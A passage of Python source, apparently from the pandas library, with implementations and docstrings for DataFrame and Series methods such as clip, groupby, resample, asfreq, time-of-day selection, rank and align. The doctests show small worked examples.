*args, **kwargs):
"""
Trim values at input threshold(s).
Assigns values outside boundary to boundary values. Thresholds
can be singular values or array like, and in the latter case
the clipping is performed element-wise in the specified axis.
Parameters
----------
lower : float or array_like, default None
Minimum threshold value. All values below this
threshold will be set to it.
upper : float or array_like, default None
Maximum threshold value. All values above this
threshold will be set to it.
axis : int or string axis name, optional
Align object with lower and upper along the given axis.
inplace : boolean, default False
Whether to perform the operation in place on the data.
.. versionadded:: 0.21.0
*args, **kwargs
Additional keywords have no effect but might be accepted
for compatibility with numpy.
See Also
--------
clip_lower : Clip values below specified threshold(s).
clip_upper : Clip values above specified threshold(s).
Returns
-------
Series or DataFrame
Same type as calling object with the values outside the
clip boundaries replaced
Examples
--------
>>> data = {'col_0': [9, -3, 0, -1, 5], 'col_1': [-2, -7, 6, 8, -5]}
>>> df = pd.DataFrame(data)
>>> df
col_0 col_1
0 9 -2
1 -3 -7
2 0 6
3 -1 8
4 5 -5
Clips per column using lower and upper thresholds:
>>> df.clip(-4, 6)
col_0 col_1
0 6 -2
1 -3 -4
2 0 6
3 -1 6
4 5 -4
Clips using specific lower and upper thresholds per column element:
>>> t = pd.Series([2, -4, -1, 6, 3])
>>> t
0 2
1 -4
2 -1
3 6
4 3
dtype: int64
>>> df.clip(t, t + 4, axis=0)
col_0 col_1
0 6 2
1 -3 -4
2 0 3
3 6 8
4 5 3
"""
if isinstance(self, ABCPanel):
raise NotImplementedError("clip is not supported yet for panels")
inplace = validate_bool_kwarg(inplace, 'inplace')
axis = nv.validate_clip_with_axis(axis, args, kwargs)
if axis is not None:
axis = self._get_axis_number(axis)
# GH 17276
# numpy doesn't like NaN as a clip value
# so ignore
if np.any(pd.isnull(lower)):
lower = None
if np.any(pd.isnull(upper)):
upper = None
# GH 2747 (arguments were reversed)
if lower is not None and upper is not None:
if is_scalar(lower) and is_scalar(upper):
lower, upper = min(lower, upper), max(lower, upper)
# fast-path for scalars
if ((lower is None or (is_scalar(lower) and is_number(lower))) and
(upper is None or (is_scalar(upper) and is_number(upper)))):
return self._clip_with_scalar(lower, upper, inplace=inplace)
result = self
if lower is not None:
result = result.clip_lower(lower, axis, inplace=inplace)
if upper is not None:
if inplace:
result = self
result = result.clip_upper(upper, axis, inplace=inplace)
return result
def clip_upper(self, threshold, axis=None, inplace=False):
"""
Return copy of input with values above given value(s) truncated.
Parameters
----------
threshold : float or array_like
axis : int or string axis name, optional
Align object with threshold along the given axis.
inplace : boolean, default False
Whether to perform the operation in place on the data
.. versionadded:: 0.21.0
See Also
--------
clip
Returns
-------
clipped : same type as input
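Examples
--------
A brief illustrative example on a constructed Series (expected
output shown):
>>> s = pd.Series([1, 2, 3, 4, 5])
>>> s.clip_upper(3)
0    1
1    2
2    3
3    3
4    3
dtype: int64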
"""
return self._clip_with_one_bound(threshold, method=self.le,
axis=axis, inplace=inplace)
def clip_lower(self, threshold, axis=None, inplace=False):
"""
Return copy of the input with values below a threshold truncated.
Parameters
----------
threshold : numeric or array-like
Minimum value allowed. All values below threshold will be set to
this value.
* float : every value is compared to `threshold`.
* array-like : The shape of `threshold` should match the object
it's compared to. When `self` is a Series, `threshold` should be
the same length. When `self` is a DataFrame, `threshold` should be 2-D
and the same shape as `self` for ``axis=None``, or 1-D and the
same length as the axis being compared.
axis : {0 or 'index', 1 or 'columns'}, default 0
Align `self` with `threshold` along the given axis.
inplace : boolean, default False
Whether to perform the operation in place on the data.
.. versionadded:: 0.21.0
See Also
--------
Series.clip : Return copy of input with values below and above
thresholds truncated.
Series.clip_upper : Return copy of input with values above
threshold truncated.
Returns
-------
clipped : same type as input
Examples
--------
Series single threshold clipping:
>>> s = pd.Series([5, 6, 7, 8, 9])
>>> s.clip_lower(8)
0 8
1 8
2 8
3 8
4 9
dtype: int64
Series clipping element-wise using an array of thresholds. `threshold`
should be the same length as the Series.
>>> elemwise_thresholds = [4, 8, 7, 2, 5]
>>> s.clip_lower(elemwise_thresholds)
0 5
1 8
2 7
3 8
4 9
dtype: int64
DataFrames can be compared to a scalar.
>>> df = pd.DataFrame({"A": [1, 3, 5], "B": [2, 4, 6]})
>>> df
A B
0 1 2
1 3 4
2 5 6
>>> df.clip_lower(3)
A B
0 3 3
1 3 4
2 5 6
Or to an array of values. By default, `threshold` should be the same
shape as the DataFrame.
>>> df.clip_lower(np.array([[3, 4], [2, 2], [6, 2]]))
A B
0 3 4
1 3 4
2 6 6
Control how `threshold` is broadcast with `axis`. In this case
`threshold` should be the same length as the axis specified by
`axis`.
>>> df.clip_lower(np.array([3, 3, 5]), axis='index')
A B
0 3 3
1 3 4
2 5 6
>>> df.clip_lower(np.array([4, 5]), axis='columns')
A B
0 4 5
1 4 5
2 5 6
"""
return self._clip_with_one_bound(threshold, method=self.ge,
axis=axis, inplace=inplace)
def groupby(self, by=None, axis=0, level=None, as_index=True, sort=True,
group_keys=True, squeeze=False, **kwargs):
"""
Group series using mapper (dict or key function, apply given function
to group, return result as series) or by a series of columns.
Parameters
----------
by : mapping, function, label, or list of labels
Used to determine the groups for the groupby.
If ``by`` is a function, it's called on each value of the object's
index. If a dict or Series is passed, the Series or dict VALUES
will be used to determine the groups (the Series' values are first
aligned; see ``.align()`` method). If an ndarray is passed, the
values are used as-is to determine the groups. A label or list of
labels may be passed to group by the columns in ``self``. Notice
that a tuple is interpreted as a (single) key.
axis : int, default 0
level : int, level name, or sequence of such, default None
If the axis is a MultiIndex (hierarchical), group by a particular
level or levels
as_index : boolean, default True
For aggregated output, return object with group labels as the
index. Only relevant for DataFrame input. as_index=False is
effectively "SQL-style" grouped output
sort : boolean, default True
Sort group keys. Get better performance by turning this off.
Note this does not influence the order of observations within each
group. groupby preserves the order of rows within each group.
group_keys : boolean, default True
When calling apply, add group keys to index to identify pieces
squeeze : boolean, default False
Reduce the dimensionality of the return type if possible,
otherwise return a consistent type
Returns
-------
GroupBy object
Examples
--------
DataFrame results
>>> data.groupby(func, axis=0).mean()
>>> data.groupby(['col1', 'col2'])['col3'].mean()
DataFrame with hierarchical index
>>> data.groupby(['col1', 'col2']).mean()
Notes
-----
See the `user guide
<http://pandas.pydata.org/pandas-docs/stable/groupby.html>`_ for more.
See also
--------
resample : Convenience method for frequency conversion and resampling
of time series.
"""
from pandas.core.groupby import groupby
if level is None and by is None:
raise TypeError("You have to supply one of 'by' and 'level'")
axis = self._get_axis_number(axis)
return groupby(self, by=by, axis=axis, level=level, as_index=as_index,
sort=sort, group_keys=group_keys, squeeze=squeeze,
**kwargs)
def asfreq(self, freq, method=None, how=None, normalize=False,
fill_value=None):
"""
Convert TimeSeries to specified frequency.
Optionally provide filling method to pad/backfill missing values.
Returns the original data conformed to a new index with the specified
frequency. ``resample`` is more appropriate if an operation, such as
summarization, is necessary to represent the data at the new frequency.
Parameters
----------
freq : DateOffset object, or string
method : {'backfill'/'bfill', 'pad'/'ffill'}, default None
Method to use for filling holes in reindexed Series (note this
does not fill NaNs that already were present):
* 'pad' / 'ffill': propagate last valid observation forward to next
valid
* 'backfill' / 'bfill': use NEXT valid observation to fill
how : {'start', 'end'}, default end
For PeriodIndex only, see PeriodIndex.asfreq
normalize : bool, default False
Whether to reset output index to midnight
fill_value : scalar, optional
Value to use for missing values, applied during upsampling (note
this does not fill NaNs that already were present).
.. versionadded:: 0.20.0
Returns
-------
converted : type of caller
Examples
--------
Start by creating a series with 4 one minute timestamps.
>>> index = pd.date_range('1/1/2000', periods=4, freq='T')
>>> series = pd.Series([0.0, None, 2.0, 3.0], index=index)
>>> df = pd.DataFrame({'s':series})
>>> df
s
2000-01-01 00:00:00 0.0
2000-01-01 00:01:00 NaN
2000-01-01 00:02:00 2.0
2000-01-01 00:03:00 3.0
Upsample the series into 30 second bins.
>>> df.asfreq(freq='30S')
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 NaN
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 NaN
2000-01-01 00:03:00 3.0
Upsample again, providing a ``fill_value``.
>>> df.asfreq(freq='30S', fill_value=9.0)
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 9.0
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 9.0
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 9.0
2000-01-01 00:03:00 3.0
Upsample again, providing a ``method``.
>>> df.asfreq(freq='30S', method='bfill')
s
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 NaN
2000-01-01 00:01:30 2.0
2000-01-01 00:02:00 2.0
2000-01-01 00:02:30 3.0
2000-01-01 00:03:00 3.0
See Also
--------
reindex
Notes
-----
To learn more about the frequency strings, please see `this link
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__.
"""
from pandas.core.resample import asfreq
return asfreq(self, freq, method=method, how=how, normalize=normalize,
fill_value=fill_value)
def at_time(self, time, asof=False):
"""
Select values at particular time of day (e.g. 9:30AM).
Parameters
----------
time : datetime.time or string
Returns
-------
values_at_time : type of caller
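Examples
--------
A small illustrative example on a constructed frame sampled every
twelve hours (expected output shown):
>>> i = pd.date_range('2018-04-09', periods=4, freq='12H')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts.at_time('12:00')
                     A
2018-04-09 12:00:00  2
2018-04-10 12:00:00  4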
"""
try:
indexer = self.index.indexer_at_time(time, asof=asof)
return self._take(indexer, convert=False)
except AttributeError:
raise TypeError('Index must be DatetimeIndex')
def between_time(self, start_time, end_time, include_start=True,
include_end=True):
"""
Select values between particular times of the day (e.g., 9:00-9:30 AM).
Parameters
----------
start_time : datetime.time or string
end_time : datetime.time or string
include_start : boolean, default True
include_end : boolean, default True
Returns
-------
values_between_time : type of caller
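Examples
--------
A small illustrative example on a constructed frame whose timestamps
advance by one day and twenty minutes (expected output shown):
>>> i = pd.date_range('2018-04-09', periods=4, freq='1D20min')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts.between_time('0:15', '0:45')
                     A
2018-04-10 00:20:00  2
2018-04-11 00:40:00  3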
"""
try:
indexer = self.index.indexer_between_time(
start_time, end_time, include_start=include_start,
include_end=include_end)
return self._take(indexer, convert=False)
except AttributeError:
raise TypeError('Index must be DatetimeIndex')
def resample(self, rule, how=None, axis=0, fill_method=None, closed=None,
label=None, convention='start', kind=None, loffset=None,
limit=None, base=0, on=None, level=None):
"""
Convenience method for frequency conversion and resampling of time
series. Object must have a datetime-like index (DatetimeIndex,
PeriodIndex, or TimedeltaIndex), or pass datetime-like values
to the on or level keyword.
Parameters
----------
rule : string
the offset string or object representing target conversion
axis : int, optional, default 0
closed : {'right', 'left'}
Which side of bin interval is closed. The default is 'left'
for all frequency offsets except for 'M', 'A', 'Q', 'BM',
'BA', 'BQ', and 'W' which all have a default of 'right'.
label : {'right', 'left'}
Which bin edge label to label bucket with. The default is 'left'
for all frequency offsets except for 'M', 'A', 'Q', 'BM',
'BA', 'BQ', and 'W' which all have a default of 'right'.
convention : {'start', 'end', 's', 'e'}
For PeriodIndex only, controls whether to use the start or end of
`rule`
kind : {'timestamp', 'period'}, optional
Pass 'timestamp' to convert the resulting index to a
``DateTimeIndex`` or 'period' to convert it to a ``PeriodIndex``.
By default the input representation is retained.
loffset : timedelta
Adjust the resampled time labels
base : int, default 0
For frequencies that evenly subdivide 1 day, the "origin" of the
aggregated intervals. For example, for '5min' frequency, base could
range from 0 through 4. Defaults to 0
on : string, optional
For a DataFrame, column to use instead of index for resampling.
Column must be datetime-like.
.. versionadded:: 0.19.0
level : string or int, optional
For a MultiIndex, level (name or number) to use for
resampling. Level must be datetime-like.
.. versionadded:: 0.19.0
Returns
-------
Resampler object
Notes
-----
See the `user guide
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#resampling>`_
for more.
To learn more about the offset strings, please see `this link
<http://pandas.pydata.org/pandas-docs/stable/timeseries.html#offset-aliases>`__.
Examples
--------
Start by creating a series with 9 one minute timestamps.
>>> index = pd.date_range('1/1/2000', periods=9, freq='T')
>>> series = pd.Series(range(9), index=index)
>>> series
2000-01-01 00:00:00 0
2000-01-01 00:01:00 1
2000-01-01 00:02:00 2
2000-01-01 00:03:00 3
2000-01-01 00:04:00 4
2000-01-01 00:05:00 5
2000-01-01 00:06:00 6
2000-01-01 00:07:00 7
2000-01-01 00:08:00 8
Freq: T, dtype: int64
Downsample the series into 3 minute bins and sum the values
of the timestamps falling into a bin.
>>> series.resample('3T').sum()
2000-01-01 00:00:00 3
2000-01-01 00:03:00 12
2000-01-01 00:06:00 21
Freq: 3T, dtype: int64
Downsample the series into 3 minute bins as above, but label each
bin using the right edge instead of the left. Please note that the
value in the bucket used as the label is not included in the bucket,
which it labels. For example, in the original series the
bucket ``2000-01-01 00:03:00`` contains the value 3, but the summed
value in the resampled bucket with the label ``2000-01-01 00:03:00``
does not include 3 (if it did, the summed value would be 6, not 3).
To include this value close the right side of the bin interval as
illustrated in the example below this one.
>>> series.resample('3T', label='right').sum()
2000-01-01 00:03:00 3
2000-01-01 00:06:00 12
2000-01-01 00:09:00 21
Freq: 3T, dtype: int64
Downsample the series into 3 minute bins as above, but close the right
side of the bin interval.
>>> series.resample('3T', label='right', closed='right').sum()
2000-01-01 00:00:00 0
2000-01-01 00:03:00 6
2000-01-01 00:06:00 15
2000-01-01 00:09:00 15
Freq: 3T, dtype: int64
Upsample the series into 30 second bins.
>>> series.resample('30S').asfreq()[0:5] #select first 5 rows
2000-01-01 00:00:00 0.0
2000-01-01 00:00:30 NaN
2000-01-01 00:01:00 1.0
2000-01-01 00:01:30 NaN
2000-01-01 00:02:00 2.0
Freq: 30S, dtype: float64
Upsample the series into 30 second bins and fill the ``NaN``
values using the ``pad`` method.
>>> series.resample('30S').pad()[0:5]
2000-01-01 00:00:00 0
2000-01-01 00:00:30 0
2000-01-01 00:01:00 1
2000-01-01 00:01:30 1
2000-01-01 00:02:00 2
Freq: 30S, dtype: int64
Upsample the series into 30 second bins and fill the
``NaN`` values using the ``bfill`` method.
>>> series.resample('30S').bfill()[0:5]
2000-01-01 00:00:00 0
2000-01-01 00:00:30 1
2000-01-01 00:01:00 1
2000-01-01 00:01:30 2
2000-01-01 00:02:00 2
Freq: 30S, dtype: int64
Pass a custom function via ``apply``
>>> def custom_resampler(array_like):
... return np.sum(array_like)+5
>>> series.resample('3T').apply(custom_resampler)
2000-01-01 00:00:00 8
2000-01-01 00:03:00 17
2000-01-01 00:06:00 26
Freq: 3T, dtype: int64
For a Series with a PeriodIndex, the keyword `convention` can be
used to control whether to use the start or end of `rule`.
>>> s = pd.Series([1, 2], index=pd.period_range('2012-01-01',
freq='A',
periods=2))
>>> s
2012 1
2013 2
Freq: A-DEC, dtype: int64
Resample by month using 'start' `convention`. Values are assigned to
the first month of the period.
>>> s.resample('M', convention='start').asfreq().head()
2012-01 1.0
2012-02 NaN
2012-03 NaN
2012-04 NaN
2012-05 NaN
Freq: M, dtype: float64
Resample by month using 'end' `convention`. Values are assigned to
the last month of the period.
>>> s.resample('M', convention='end').asfreq()
2012-12 1.0
2013-01 NaN
2013-02 NaN
2013-03 NaN
2013-04 NaN
2013-05 NaN
2013-06 NaN
2013-07 NaN
2013-08 NaN
2013-09 NaN
2013-10 NaN
2013-11 NaN
2013-12 2.0
Freq: M, dtype: float64
For DataFrame objects, the keyword ``on`` can be used to specify the
column instead of the index for resampling.
>>> df = pd.DataFrame(data=9*[range(4)], columns=['a', 'b', 'c', 'd'])
>>> df['time'] = pd.date_range('1/1/2000', periods=9, freq='T')
>>> df.resample('3T', on='time').sum()
a b c d
time
2000-01-01 00:00:00 0 3 6 9
2000-01-01 00:03:00 0 3 6 9
2000-01-01 00:06:00 0 3 6 9
For a DataFrame with MultiIndex, the keyword ``level`` can be used to
specify on which level the resampling needs to take place.
>>> time = pd.date_range('1/1/2000', periods=5, freq='T')
>>> df2 = pd.DataFrame(data=10*[range(4)],
columns=['a', 'b', 'c', 'd'],
index=pd.MultiIndex.from_product([time, [1, 2]])
)
>>> df2.resample('3T', level=0).sum()
a b c d
2000-01-01 00:00:00 0 6 12 18
2000-01-01 00:03:00 0 4 8 12
See also
--------
groupby : Group by mapping, function, label, or list of labels.
"""
from pandas.core.resample import (resample,
_maybe_process_deprecations)
axis = self._get_axis_number(axis)
r = resample(self, freq=rule, label=label, closed=closed,
axis=axis, kind=kind, loffset=loffset,
convention=convention,
base=base, key=on, level=level)
return _maybe_process_deprecations(r,
how=how,
fill_method=fill_method,
limit=limit)
def first(self, offset):
"""
Convenience method for subsetting initial periods of time series data
based on a date offset.
Parameters
----------
offset : string, DateOffset, dateutil.relativedelta
Examples
--------
ts.first('10D') -> First 10 days
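An illustrative doctest on a small constructed frame indexed every
two days (expected output shown; '3D' counts calendar days from the
first index value):
>>> i = pd.date_range('2018-04-09', periods=4, freq='2D')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts.first('3D')
            A
2018-04-09  1
2018-04-11  2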
Returns
-------
subset : type of caller
"""
from pandas.tseries.frequencies import to_offset
if not isinstance(self.index, DatetimeIndex):
raise NotImplementedError("'first' only supports a DatetimeIndex "
"index")
if len(self.index) == 0:
return self
offset = to_offset(offset)
end_date = end = self.index[0] + offset
# Tick-like, e.g. 3 weeks
if not offset.isAnchored() and hasattr(offset, '_inc'):
if end_date in self.index:
end = self.index.searchsorted(end_date, side='left')
return self.iloc[:end]
return self.loc[:end]
def last(self, offset):
"""
Convenience method for subsetting final periods of time series data
based on a date offset.
Parameters
----------
offset : string, DateOffset, dateutil.relativedelta
Examples
--------
ts.last('5M') -> Last 5 months
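An illustrative doctest, reusing the small constructed frame shown
for ``first`` (expected output shown; '3D' counts calendar days back
from the last index value):
>>> i = pd.date_range('2018-04-09', periods=4, freq='2D')
>>> ts = pd.DataFrame({'A': [1, 2, 3, 4]}, index=i)
>>> ts.last('3D')
            A
2018-04-13  3
2018-04-15  4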
Returns
-------
subset : type of caller
"""
from pandas.tseries.frequencies import to_offset
if not isinstance(self.index, DatetimeIndex):
raise NotImplementedError("'last' only supports a DatetimeIndex "
"index")
if len(self.index) == 0:
return self
offset = to_offset(offset)
start_date = self.index[-1] - offset
start = self.index.searchsorted(start_date, side='right')
return self.iloc[start:]
def rank(self, axis=0, method='average', numeric_only=None,
na_option='keep', ascending=True, pct=False):
"""
Compute numerical data ranks (1 through n) along axis. Equal values are
assigned a rank that is the average of the ranks of those values
Parameters
----------
axis : {0 or 'index', 1 or 'columns'}, default 0
index to direct ranking
method : {'average', 'min', 'max', 'first', 'dense'}
* average: average rank of group
* min: lowest rank in group
* max: highest rank in group
* first: ranks assigned in order they appear in the array
* dense: like 'min', but rank always increases by 1 between groups
numeric_only : boolean, default None
Include only float, int, boolean data. Valid only for DataFrame or
Panel objects
na_option : {'keep', 'top', 'bottom'}
* keep: leave NA values where they are
* top: smallest rank if ascending
* bottom: smallest rank if descending
ascending : boolean, default True
False for ranks by high (1) to low (N)
pct : boolean, default False
Computes percentage rank of data
Returns
-------
ranks : same type as caller
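Examples
--------
A small illustrative example comparing the default 'average' method
with the 'dense' method on a constructed Series (expected output
shown):
>>> s = pd.Series([3, 1, 4, 1])
>>> s.rank()
0    3.0
1    1.5
2    4.0
3    1.5
dtype: float64
>>> s.rank(method='dense')
0    2.0
1    1.0
2    3.0
3    1.0
dtype: float64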
"""
axis = self._get_axis_number(axis)
if self.ndim > 2:
msg = "rank does not make sense when ndim > 2"
raise NotImplementedError(msg)
def ranker(data):
ranks = algos.rank(data.values, axis=axis, method=method,
ascending=ascending, na_option=na_option,
pct=pct)
ranks = self._constructor(ranks, **data._construct_axes_dict())
return ranks.__finalize__(self)
# if numeric_only is None, and we can't get anything, we try with
# numeric_only=True
if numeric_only is None:
try:
return ranker(self)
except TypeError:
numeric_only = True
if numeric_only:
data = self._get_numeric_data()
else:
data = self
return ranker(data)
_shared_docs['align'] = ("""
Align two objects on their axes with the
specified join method for each axis Index
Parameters
----------
other : DataFrame or Series
join : {'outer', 'inner', 'left', 'right'}, default 'outer'
axis : allowed axis of the other object, default None
Align on index (0), columns (1), or both (None)
level : int or level name, default None
Broadcast across a level, matching Index values on the
passed MultiIndex level
copy : boolean, default True
Always returns new objects. If copy=False and no reindexing is
required then original objects are returned.
fill_value : scalar, default np.NaN
Value to use for missing values. Defaults to NaN, but can be any
"compatible" value
method : str, default None
limit : int, default None
fill_axis : %(axes_single_arg)s, default 0
Filling axis, method and limit
broadcast_axis : %(axes_single_arg)s, default None
Broadcast values along this axis, if aligning two objects of
different dimensions
Returns
-------
(left, right) : (%(klass)s, type of other)
Aligned objects
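Examples
--------
A minimal illustrative example aligning two constructed Series on an
outer join of their indexes (expected output shown; labels missing
from either side are filled with NaN):
>>> s1 = pd.Series([1, 2], index=['a', 'b'])
>>> s2 = pd.Series([3, 4], index=['b', 'c'])
>>> left, right = s1.align(s2, join='outer')
>>> left
a    1.0
b    2.0
c    NaN
dtype: float64
>>> right
a    NaN
b    3.0
c    4.0
dtype: float64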
""")
@Appender(_shared_docs['align'] % _shared_doc_kwargs)
def align(self, other, join='outer', axis=None, level=None, copy=True,
fill_value=None, method=None, limit=None, fill_axis=0,
broadcast_axis=None):
from pandas import DataFrame, Series
method = missing.clean_fill_method(method)
if broadcast_axis == 1 and self.ndim != other.ndim:
if isinstance(self, Series):
# this means other is a DataFrame, and we need to broadcast
# self
cons = self._constructor_expanddim
df = cons({c: self for c in other.columns},
**other._construct_axes_dict())
return df._align_frame(other, join=join, axis=axis,
level=level, copy=copy,
fill_value=fill_value, method=method,
limit=limit, fill_axis=fill_axis)
elif isinstance(other, Series):
# this means self is a DataFrame, and we need to broadcast
# other
cons = other._constructor_expanddim
df = cons({c: other for c in self.columns},
**self._construct_axes_dict())
return self._align_frame(df, join=join, axis=axis, level=level,
copy=copy, fill_value=fill_value,
method=method, limit=limit,
fill_axis=fill_axis)
if axis is not None:
axis = self._get_axis_number(axis)
if isinstance(other, DataFrame):
return self._align_frame(other, join=join, axis=axis, level=level,
copy=copy, fill_value=fill_value,
method=method, limit=limit,
fill_axis=fill_axis)
elif isinstance(other, Series):
return self._align_series(other, join=join, axis=axis, level=level,
copy=copy, fill_value=fill_value,
method=method, limit=limit,
fill_axis=fill_axis)
else: # pragma: no cover
raise TypeError('unsupported type: %s' % type(other))
def _align_frame(self, other, join='outer', axis=None, level=None,
copy=True, fill_value=np.nan, method=None, limit=None,
fill_axis=0):
# defaults
join_index, join_columns = None, None
ilidx, iridx = None, None
clidx, cridx = None, None
is_series = isinstance(self, ABCSeries)
if axis is None or axis == 0:
if not self.index.equals(other.index):
join_index, ilidx, iridx = self.index.join(
other.index, how=join, level=level, return_indexers=True)
if axis is None or axis == 1:
if not is_series and not self.columns.equals(other.columns):
join_columns, clidx, cridx = self.columns.join(
other.columns, how=join, level=level, return_indexers=True)
if is_series:
reindexers = {0: [join_index, ilidx]}
else:
reindexers = {0: [join_index, ilidx], 1: [join_columns, clidx]}
left = self._reindex_with_indexers(reindexers, copy=copy,
fill_value=fill_value,
allow_dups=True)
# other must be always DataFrame
right = other._reindex_with_indexers({0: [join_index, iridx],
1: [join_columns, cridx]},
copy=copy, fill_value=fill_value,
allow_dups=True)
if method is not None:
left = left.fillna(axis=fill_axis, method=method, limit=limit)
right = right.fillna(axis=fill_axis, method=method, limit=limit)
# if DatetimeIndex have different tz, convert to UTC
if is_datetime64tz_dtype(left.index):
if left.index.tz != right.index.tz:
if join_index is not None:
left.index = join_index
right.index = join_index
return left.__finalize__(self), right.__finalize__(other)
def _align_series(self, other, join='outer', axis=None, level=None,
copy=True, fill_value=None, method=None, limit=None,
fill_axis=0):
is_series = isinstance(self, ABCSeries)
# series/series compat, other must always be a Series
if is_series:
if axis:
raise ValueError('cannot align series to a series other than '
'axis 0')
# equal
if self.index.equals(other.index):
join_index, lidx, ridx = None, None, None
else:
join_index, lidx, ridx = self.index.join(other.index, how=join,
level=level,
return_indexers=True)
left = self._reindex_indexer(join_index, lidx, copy)
right = other._reindex_indexer(join_index, ridx, copy)
else:
# one has > 1 ndim
fdata = self._data
if axis == 0:
join_index = self.index
lidx, ridx = None, None
if not self.index.equals(other.index):
join_index, lidx, ridx = self.index.join(
other.index, how=join, level=level,
return_indexers=True)
if lidx is not None:
fdata = fdata.reindex_indexer(join_index, lidx, axis=1)
elif axis == 1:
join_index = self.columns
lidx, ridx = None, None
if not self.columns.equals(other.index):
join_index, lidx, ridx = self.columns.join(
other.index, how=join, level=level,
return_indexers=True)
if lidx is not None:
fdata = fdata.reindex_indexer(join_index, lidx, axis=0)
else:
raise ValueError('Must specify axis=0 or 1')
if copy and fdata is self._data:
fdata = fdata.copy()
left = self._constructor(fdata)
if ridx is None:
right = other
else:
right = other.reindex(join_index, level=level)
# fill
fill_na = notna(fill_value) or (method is not None)
if fill_na:
left = left.fillna(fill_value, method=method, limit=limit,
axis=fill_axis)
right = right.fillna(fill_value, method=method, limit=limit)
# if DatetimeIndex have different tz, convert to UTC
if is_series or (not is_series and axis == 0):
if is_datetime64tz_dtype(left.index):
if left.index.tz != right.index.tz:
if join_index is not None:
left.index = join_index
right.index = join_index
return left.__finalize__(self), right.__finalize__(other)
def _where(self, cond, other=np.nan, inplace=False, axis=None, level=None,
errors='raise', try_cast=False):
"""
Equivalent to public method `where`, except that `other` is not
applied as a function even if callable. Used in __setitem__.
"""
inplace = validate_bool_kwarg(inplace, 'inplace')
# align the cond to same shape as myself
cond = com._apply_if_callable(cond, self)
if isinstance(cond, NDFrame):
cond, _ = cond.align(self, join='right', broadcast_axis=1)
else:
if not hasattr(cond, 'shape'):
cond = np.asanyarray(cond)
if cond.shape != self.shape:
raise ValueError('Array conditional must be same shape as '
'self')
cond = self._constructor(cond, **self._construct_axes_dict())
# make sure we are boolean
fill_value = True if inplace else False
cond = cond.fillna(fill_value)
msg = "Boolean array expected for the condition, not {dtype}"
if not isinstance(cond, pd.DataFrame):
# This is a single-dimensional object.
if not is_bool_dtype(cond):
raise ValueError(msg.format(dtype=cond.dtype))
else:
for dt in cond.dtypes:
if not is_bool_dtype(dt):
raise ValueError(msg.format(dtype=dt))
cond = cond.astype(bool, copy=False)
cond = -cond if inplace else cond
# try to align with other
try_quick = True
if hasattr(other, 'align'):
# align with me
if other.ndim <= self.ndim:
_, other = self.align(other, join='left', axis=axis,
level=level, fill_value=np.nan)
# if we are NOT aligned, raise as we cannot where index
if (axis is None and
not all(other._get_axis(i).equals(ax)
for i, ax in enumerate(self.axes))):
raise InvalidIndexError
# slice me out of the other
else:
raise NotImplementedError("cannot align with a higher "
"dimensional NDFrame")
if isinstance(other, np.ndarray):
if other.shape != self.shape:
if self.ndim == 1:
icond = cond.values
# GH 2745 / GH 4192
# treat like a scalar
if len(other) == 1:
other = np.array(other[0])
# GH 3235
# match True cond to other
elif len(cond[icond]) == len(other):
# try to not change dtype at first (if try_quick)
if try_quick:
try:
new_other = com._values_from_object(self)
new_other = new_other.copy()
new_other[icond] = other
other = new_other
except Exception:
try_quick = False
# let's create a new array (if we failed at the above,
# or try_quick is False)
if not try_quick:
dtype, fill_value = maybe_promote(other.dtype)
new_other = np.empty(len(icond), dtype=dtype)
new_other.fill(fill_value)
maybe_upcast_putmask(new_other, icond, other)
other = new_other
else:
raise ValueError('Length of replacements must equal '
'series length')
else:
raise ValueError('other must be the same shape as self '
'when an ndarray')
# we are the same shape, so create an actual object for alignment
else:
other = self._constructor(other, **self._construct_axes_dict())
if axis is None:
axis = 0
if self.ndim == getattr(other, 'ndim', 0):
align = True
else:
align = (self._get_axis_number(axis) == 1)
block_axis = self._get_block_manager_axis(axis)
if inplace:
# we may have different type blocks come out of putmask, so
# reconstruct the block manager
self._check_inplace_setting(other)
new_data = self._data.putmask(mask=cond, new=other, align=align,
inplace=True, axis=block_axis,
transpose=self._AXIS_REVERSED)
self._update_inplace(new_data)
else:
new_data = self._data.where(other=other, cond=cond, align=align,
errors=errors,
try_cast=try_cast, axis=block_axis,
transpose=self._AXIS_REVERSED)
return self._constructor(new_data).__finalize__(self)
_shared_docs['where'] = ("""
Return an object of same shape as self and whose corresponding
entries are from self where `cond` is %(cond)s and otherwise are from
`other`.
Parameters
----------
cond : boolean %(klass)s, array-like, or callable
Where `cond` is %(cond)s, keep the original value. Where
%(cond_rev)s, replace with corresponding value from `other`.
If `cond` is callable, it is computed on the %(klass)s and
should return boolean %(klass)s or array. The callable must
not change input %(klass)s (though pandas doesn't check it).
.. versionadded:: 0.18.1
A callable can be used as cond.
other : scalar, %(klass)s, or callable
Entries where `cond` is %(cond_rev)s are replaced with
corresponding value from `other`.
If other is callable, it is computed on the %(klass)s and
should return scalar or %(klass)s. The callable must not
change input %(klass)s (though pandas doesn't check it).
.. versionadded:: 0.18.1
A callable can be used as other.
inplace : boolean, default False
Whether to perform the operation in place on the data
axis : alignment axis if needed, default None
level : alignment level if needed, default None
errors : str, {'raise', 'ignore'}, default 'raise'
- ``raise`` : allow exceptions to be raised
- ``ignore`` : suppress exceptions. On error return original object
Note that currently this parameter won't affect
the results and will always coerce to a suitable dtype.
try_cast : boolean, default False
Try to cast the result back to the input type (if possible).
raise_on_error : boolean, default True
Whether to raise on invalid data types (e.g. trying to where on
strings)
.. deprecated:: 0.21.0
Returns
-------
wh : same type as caller
Notes
-----
The %(name)s method is an application of the if-then idiom. For each
element in the calling DataFrame, if ``cond`` is ``%(cond)s`` the
element is used; otherwise the corresponding element from the DataFrame
``other`` is used.
The signature for :func:`DataFrame.where` differs from
:func:`numpy.where`. Roughly ``df1.where(m, df2)`` is equivalent to
``np.where(m, df1, df2)``.
For further details and examples see the ``%(name)s`` documentation in
:ref:`indexing <indexing.where_mask>`.
Examples
--------
